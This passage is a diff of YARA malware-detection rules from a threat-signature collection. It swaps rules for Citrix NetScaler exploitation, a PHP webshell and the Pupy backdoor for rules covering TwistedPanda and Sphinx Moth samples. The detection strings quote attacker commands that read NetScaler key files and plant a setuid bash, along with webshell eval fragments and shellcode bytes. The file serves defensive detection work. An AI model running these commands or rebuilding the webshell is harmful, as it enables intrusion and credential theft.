-		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
+		tags = ""
+		incident = "10118538"
+		MD5_1 = "598FF82EA4FB52717ACAFB227C83D474"
+		MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032"
+		MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630"
+		MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83"
+		MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D"
 
 	strings:
-		$x1 = "CAPESPN.DLL" fullword wide
-		$x2 = "WINF.DLL" fullword wide
-		$x3 = "NCFG.DLL" fullword wide
-		$x4 = "msgrthlp.dll" fullword wide
-		$x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
-		$x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
-		$a1 = "Interface\\%s\\info" fullword ascii
-		$a2 = "Interface\\%s\\info\\%s" fullword ascii
-		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
-		$a4 = "CLSID\\%s\\info" fullword ascii
-		$b1 = "Windows Shell Icon Handler" fullword wide
-		$b2 = "Microsoft Shell Icon Handler" fullword wide
-		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
-		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
-		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
-		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
-		$s5 = "%sMutex" fullword ascii
-		$s6 = "\\ShellIconCache" ascii
-		$s7 = "+6Service Pack " fullword ascii
+		$s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 }
+		$s1 = "C:\\Users\\user\\Desktop\\my_OK_2014\\bit9\\runsna\\Release\\runsna.pdb"
+		$s2 = "d:\\work\\plug4.0(shellcode)"
+		$s3 = "\\shellcode\\shellcode\\XSetting.h"
+		$s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 }
+		$s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 }
+		$s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 }
+		$s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 }
+		$s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 }
+		$s9 = "RedLeavesCMDSimulatorMutex"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 350KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* ) and 1 of ( $x* )
+		$s0 or $s1 or $s2 and $s3 or $s4 or $s5 or $s6 or $s7 or $s8 or $s9
 }
-rule SIGNATURE_BASE_Cheshirecat_Gen2 : FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_Loader : FILE
 {
 	meta:
-		description = "Cheshire Cat Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b97b20bd-f6b9-512f-ba99-6c38ba7853be"
-		date = "2015-08-08"
+		description = "Detects loader used by TwistedPanda"
+		author = "Check Point Research"
+		id = "a10f6019-f069-579c-b112-18537a7d8fd8"
+		date = "2022-04-14"
 		modified = "2023-12-05"
-		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cheshirecat.yar#L76-L108"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L1-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c5d6ce6cc09c416d3449f7f5fc09139ce9271b69d743832b4b2548682e4ddf1"
-		score = 70
+		logic_hash = "b6b3892432be4bd8dfd44f08c124865c54d5ad2dc90b630072f19f7144d33555"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
-		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
-		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
-		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
+		hash1 = "5b558c5fcbed8544cb100bd3db3c04a70dca02eec6fedffd5e3dcecb0b04fba0"
+		hash2 = "efa754450f199caae204ca387976e197d95cdc7e83641444c1a5a91b58ba6198"
 
 	strings:
-		$a1 = "Interface\\%s\\info" fullword ascii
-		$a2 = "Interface\\%s\\info\\%s" fullword ascii
-		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
-		$a4 = "CLSID\\%s\\info" fullword ascii
-		$b1 = "Windows Shell Icon Handler" fullword wide
-		$b2 = "Microsoft Shell Icon Handler" fullword wide
-		$s1 = "\\StringFileInfo\\%s\\FileVersion" ascii
-		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
-		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
-		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
-		$s5 = "%sMutex" fullword ascii
-		$s6 = "\\ShellIconCache" ascii
-		$s7 = "+6Service Pack " fullword ascii
+		$seq1 = { 6A 40 68 00 30 00 00 }
+		$seq2 = { 6A 00 50 6A 14 8D ?? ?? ?? ?? ?? 50 53 FF }
+		$seq3 = { 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 80 }
+		$decryption = { 8B C? [2-3] F6 D? 1A C? [2-3] [2-3] 30 0? ?? 4? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 7 of ( $s* ) and 2 of ( $a* ) and 1 of ( $b* )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and all of ( $seq* ) and $decryption
 }
-rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_2 : CVE_2023_3519 FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_1 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
-		author = "Florian Roth"
-		id = "471ce547-0133-5836-b9d1-02c932ecfd1e"
-		date = "2023-07-21"
+		description = "Detects the obfuscated variant of SPINNER payload used by TwistedPanda"
+		author = "Check Point Research"
+		id = "0b44013d-0caa-5ea2-ab08-e2a6a5732c03"
+		date = "2022-04-14"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/sites/default/files/2023-07/aa23-201a_csa_threat_actors_exploiting_citrix-cve-2023-3519_to_implant_webshells.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L27-L41"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L46-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "48d4225d0935084003f7a98c554d7c4722a91290dfe190001da52bce332b3f7d"
-		score = 70
+		logic_hash = "e7abe4b3f4225596131882a9175f9ac2e45ba00557950772a8e4d1eaeab97d05"
+		score = 80
 		quality = 85
-		tags = "CVE-2023-3519, FILE"
+		tags = "FILE"
+		hash1 = "a9fb7bb40de8508606a318866e0e5ff79b98f314e782f26c7044622939dfde81"
 
 	strings:
-		$s1 = "tar -czvf - /var/tmp/all.txt" ascii fullword
-		$s2 = "-out /var/tmp/test.tar.gz" ascii
-		$s3 = "/test.tar.gz /netscaler/"
+		$config_init = { C7 ?? ?? ?? 00 00 00 C7 ?? ?? ?? 00 00 00 C6 }
+		$c2_cmd_1 = { 01 00 03 10}
+		$c2_cmd_2 = { 02 00 01 10}
+		$c2_cmd_3 = { 01 00 01 10}
+		$decryption = { 8D 83 [4] 80 B3 [5] 89 F1 6A 01 50 E8 [4] 80 B3 }
 
 	condition:
-		filesize < 10MB and 1 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
 }
-rule SIGNATURE_BASE_EXPL_Citrix_Netscaler_ADC_Forensicartifacts_CVE_2023_3519_Jul23_3 : CVE_2023_3519 FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_2 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found after an exploitation of Citrix NetScaler ADC CVE-2023-3519"
-		author = "Florian Roth"
-		id = "2f40b423-f1da-5711-ac4f-18de77cd52d0"
-		date = "2023-07-24"
+		description = "Detects an older variant of SPINNER payload used by TwistedPanda"
+		author = "Check Point Research"
+		id = "bbbf3af1-127f-5d32-967f-bdb94311d1d6"
+		date = "2022-04-14"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L43-L61"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L82-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e78e1a788503b841ed0f4e5cd415eb35d8911092778120d7fd061ed20820da37"
-		score = 70
+		logic_hash = "d1e34903e58fb76671a076acbb9f26e10d511c8f00be90b4901d61b73b90a9a7"
+		score = 80
 		quality = 85
-		tags = "CVE-2023-3519, FILE"
+		tags = "FILE"
+		hash1 = "28ecd1127bac08759d018787484b1bd16213809a2cc414514dc1ea87eb4c5ab8"
 
 	strings:
-		$x1 = "cat /flash/nsconfig/ns.conf >>" ascii
-		$x2 = "cat /nsconfig/.F1.key >>" ascii
-		$x3 = "openssl base64 -d < /tmp/" ascii
-		$x4 = "cp /usr/bin/bash /var/tmp/bash" ascii
-		$x5 = "chmod 4775 /var/tmp/bash"
-		$x6 = "pwd;pwd;pwd;pwd;pwd;"
-		$x7 = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
+		$config_init = { C7 [3] 00 00 00 C7 [3] 00 00 00 C6 }
+		$c2_cmd_1 = { 01 00 03 10 }
+		$c2_cmd_2 = { 02 00 01 10 }
+		$c2_cmd_3 = { 01 00 01 10 }
+		$c2_cmd_4 = { 01 00 00 10 }
+		$c2_cmd_5 = { 02 00 00 10 }
+		$decryption = { 80 B3 [5] 8D BB [4] 8B 56 14 8B C2 8B 4E 10 2B C1 83 F8 01 }
 
 	condition:
-		filesize < 10MB and 1 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
 }
-rule SIGNATURE_BASE_LOG_EXPL_Citrix_Netscaler_ADC_Exploitation_Attempt_CVE_2023_3519_Jul23_1 : CVE_2023_3519
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_64Bit_Loader : FILE
 {
 	meta:
-		description = "This YARA rule detects forensic artifacts that appear following an attempted exploitation of Citrix NetScaler ADC CVE-2023-3519. The rule identifies an attempt to access the vulnerable function using an overly long URL, a potential sign of attempted exploitation. However, it does not confirm whether such an attempt was successful."
-		author = "Florian Roth"
-		id = "7dfe4130-d976-5d6d-a05d-ccadefe45406"
-		date = "2023-07-27"
+		description = "Detects the 64bit Loader DLL used by TwistedPanda"
+		author = "Check Point Research"
+		id = "2172dd33-204b-5a05-ad26-534a0c1d7a17"
+		date = "2022-04-14"
 		modified = "2023-12-05"
-		reference = "https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L63-L77"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L120-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ad3164c5b2616b12a513a2bb3736d530769e75fca03346a72351a27b8343b2a"
-		score = 65
-		quality = 60
-		tags = "CVE-2023-3519"
+		logic_hash = "644547f9fa6ca3f34ea32e06896f341e0c92f5c57dee3c478aed0cdf87b2f3de"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		hash1 = "e0d4ef7190ff50e6ad2a2403c87cc37254498e8cc5a3b2b8798983b1b3cdc94f"
 
 	strings:
-		$sr1 = /GWTEST FORMS SSO: Parse=0; URLLEN=([2-9][0-9]{2}|[0-9]{4,20}); Event: start=0x/
-		$s1 = ", type=1; Target: start=0x"
+		$path_check = { 48 8D [6] 48 8B ?? 48 81 [5] 72 }
+		$shellcode_read = { 48 8B D0 41 B8 F0 16 00 00 48 8B CF 48 8B D8 FF}
+		$shellcode_allocate = { BA F0 16 00 00 44 8D 4E 40 33 C9 41 B8 00 30 00 00 FF }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and $path_check and $shellcode_allocate and $shellcode_read
 }
-rule SIGNATURE_BASE_WEBSHELL_SECRETSAUCE_Jul23_1 : CVE_2023_3519 FILE
+rule SIGNATURE_BASE_APT_CN_Twistedpanda_Droppers : FILE
 {
 	meta:
-		description = "Detects SECRETSAUCE PHP webshells (found after an exploitation of Citrix NetScaler ADC CVE-2023-3519)"
-		author = "Florian Roth"
-		id = "db0542e7-648e-5f60-9838-e07498f58b51"
-		date = "2023-07-24"
+		description = "Detects droppers used by TwistedPanda"
+		author = "Check Point Research"
+		id = "f61c8b97-5870-5837-942f-f1650870960a"
+		date = "2022-04-14"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/citrix-zero-day-espionage"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_citrix_netscaler_adc_exploitation_cve_2023_3519.yar#L79-L100"
+		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_twisted_panda.yar#L157-L194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c762d46ae43a3e10453c2ee17039812a06086ac85bdb000cf8308f5196a9dee2"
-		score = 85
+		logic_hash = "820b4796511dcf98cdc8017a39cc2c65e44d8d9a20f55803aa1ddd36f649c83a"
+		score = 80
 		quality = 85
-		tags = "CVE-2023-3519, FILE"
+		tags = "FILE"
+		hash1 = "59dea38da6e515af45d6df68f8959601e2bbf0302e35b7989e741e9aba2f0291"
+		hash2 = "8b04479fdf22892cdfebd6e6fbed180701e036806ed0ddbe79f0b29f73449248"
+		hash3 = "f29a0cda6e56fc0e26efa3b6628c6bcaa0819a3275a10e9da2a8517778152d66"
 
 	strings:
-		$sa1 = "for ($x=0; $x<=1; $x++) {" ascii
-		$sa2 = "$_REQUEST[" ascii
-		$sa3 = "@eval" ascii
-		$sb1 = "public $cmd;" ascii
-		$sb2 = "return @eval($a);" ascii
-		$sb3 = "$z->run($z->get('openssl_public_decrypt'));"
+		$switch_control = { 81 FA [4] 75 ?? E8 [4] 48 89 05 [4] E? }
+		$byte_manipulation = { 41 0F [2] 44 [2] 41 [2] 03 41 81 [5] 41 }
+		$stack_strings_1 = { 25 00 70 00 }
+		$stack_strings_2 = { 75 00 62 00 }
+		$stack_strings_3 = { 6C 00 69 00 }
+		$stack_strings_4 = { 63 00 25 00 }
 
 	condition:
-		filesize < 100KB and ( all of ( $sa* ) or 2 of ( $sb* ) )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #switch_control > 8 and all of ( $stack_strings_* ) and $byte_manipulation
 }
-rule SIGNATURE_BASE_EXPL_CVE_2021_1647_Apr21_1 : CVE_2021_1647 FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Cudacrt : FILE
 {
 	meta:
-		description = "Detects samples that exploit CVE-2021-1647"
-		author = "Arkbird_SOLG"
-		id = "ecce018e-1bee-5374-b6c8-984c2a8c2530"
-		date = "2021-05-04"
+		description = "sphinx moth threat group file cudacrt.dll"
+		author = "Kudelski Security - Nagravision SA"
+		id = "233f657b-029a-5ed4-b2f7-712851297f18"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_1647.yar#L2-L18"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L9-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0e1809ba10e5ea624e1c4d2e948c928c590b40e6315def8cb1216930ead8579"
+		logic_hash = "ae7ff3d5ffd29de80ce5dcccde9af04d2537a279fe35f6e94257d59a462ba6a0"
 		score = 75
 		quality = 85
-		tags = "CVE-2021-1647, FILE"
-		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
-		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
-		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
-		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
+		tags = "FILE"
 
 	strings:
-		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
-		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
+		$s0 = "HPSSOEx.dll" fullword wide
+		$s1 = "255.255.255.254" fullword wide
+		$s2 = "SOFTWARE\\SsoAuth\\Service" fullword wide
+		$op0 = { ff 15 5f de 00 00 48 8b f8 48 85 c0 75 0d 48 8b }
+		$op1 = { 45 33 c9 4c 8d 05 a7 07 00 00 33 d2 33 c9 ff 15 }
+		$op2 = { e8 7a 1c 00 00 83 f8 01 74 17 b9 03 }
 
 	condition:
-		filesize > 10KB and filesize < 10000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 243KB and all of ( $s* ) and 1 of ( $op* )
 }
-
-rule SIGNATURE_BASE_Pupy_Backdoor : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_H2T : FILE
 {
 	meta:
-		description = "Detects Pupy backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "11509847-3454-5412-b3e1-02ad9cccc6ae"
-		date = "2017-08-11"
+		description = "sphinx moth threat group file h2t.dat"
+		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+		id = "62d14efd-7d0b-5f66-9e78-74f3f9e2fd5b"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/n1nj4sec/pupy-binaries"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pupy_rat.yar#L13-L44"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b12376c9cddc71f584314b07fb29fac189349b526c6d5028f475fa3984401ae"
+		logic_hash = "7aca260d415de84cf432b18385db6a9768a036e3bd0a9aa8ded4a1bfcad26d0c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153"
-		hash2 = "83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4"
-		hash3 = "90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc"
-		hash4 = "20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8"
-		hash5 = "06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e"
-		hash6 = "be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2"
-		hash7 = "8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01"
 
 	strings:
-		$x1 = "reflectively inject a dll into a process." fullword ascii
-		$x2 = "ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid" fullword ascii
-		$x3 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" fullword ascii
-		$x4 = "reflective_inject_dll" fullword ascii
-		$x5 = "ld_preload_inject_dll" fullword ascii
-		$x6 = "get_pupy_config() -> string" fullword ascii
-		$x7 = "[INJECT] inject_dll. OpenProcess failed." fullword ascii
-		$x8 = "reflective_inject_dll" fullword ascii
-		$x9 = "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)" fullword ascii
-		$x10 = "linux_inject_main" fullword ascii
+		$x1 = "%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd]" fullword ascii
+		$s1 = "[-] Error in connection() %d - %s" fullword ascii
+		$s2 = "[-] Child process exit." fullword ascii
+		$s3 = "POST http://%s:%s/ HTTP/1.1" fullword ascii
+		$s4 = "pipe() to" fullword ascii
+		$s5 = "pipe() from" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 7000KB and 1 of them ) or 3 of them or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "84a69bce2ff6d9f866b7ae63bd70b163" )
+		uint16( 0 ) == 0x5a4d and filesize < 156KB and ( $x1 or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_MAL_CMD_Script_Obfuscated_Feb19_1 : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Iastor32 : FILE
 {
 	meta:
-		description = "Detects obfuscated batch script using env variable sub-strings"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8cc99ff5-968c-5b12-9aac-72279c1b8a6b"
-		date = "2019-03-01"
+		description = "sphinx moth threat group file iastor32.exe"
+		author = "Kudelski Security - Nagravision SA"
+		id = "5688c598-ea18-578f-bb8a-3729c0502af5"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/DbgShell/status/1101076457189793793"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cmd_script_obfuscated.yar#L2-L18"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sphinx_moth.yar#L47-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71c8831686796c921674ec293b5bdf2c42ae9069b258c85c9e0ca6a7f972daf8"
+		logic_hash = "056949677654a88fb430c988939006dacfefdabbe12824936a01e5aabbb73441"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "deed88c554c8f9bef4078e9f0c85323c645a52052671b94de039b438a8cff382"
 
 	strings:
-		$h1 = { 40 65 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 }
-		$s1 = { 2C 31 25 0D 0A 65 63 68 6F 20 25 25 }
+		$s0 = "MIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nN" fullword ascii
+		$s1 = "iAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x6540 and filesize < 200KB and $h1 at 0 and uint16( filesize -3 ) == 0x0d25 and uint8( filesize -1 ) == 0x0a and $s1 in ( filesize -200 .. filesize )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_PHISH_Shellcode_Enc_Payload_Feb25 : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Kerberos32 : FILE
 {
 	meta:
-		description = "Detects unknown of phishing-delivered malware"
-		author = "X__Junior"
-		id = "8459c5ba-37ec-59bd-8d4a-5ab7b6bb4553"
